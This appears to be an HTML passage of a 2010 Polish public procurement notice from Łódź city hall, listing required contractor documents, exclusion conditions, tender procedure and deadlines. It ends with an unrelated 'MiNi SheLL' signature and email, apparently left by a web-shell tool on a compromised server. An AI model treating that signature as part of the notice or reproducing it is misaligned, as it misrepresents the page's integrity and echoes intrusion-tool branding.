<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z odpowiednim zachowaniem terminów ich wystawienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.bip.uml.lodz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych
Urzędu Miasta Łodzi
 ul. ks. Ignacego Skorupki 21
90-532 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 12:00, miejsce: Ofertę należy złożyć w sekretariacie Wydziału Zamówień Publicznych Urzędu Miasta Łodzi, ul. ks. Ignacego Skorupki 21, 90-532 Łódź, pokój nr 8, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej i  nie zamierza ustanawiać dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com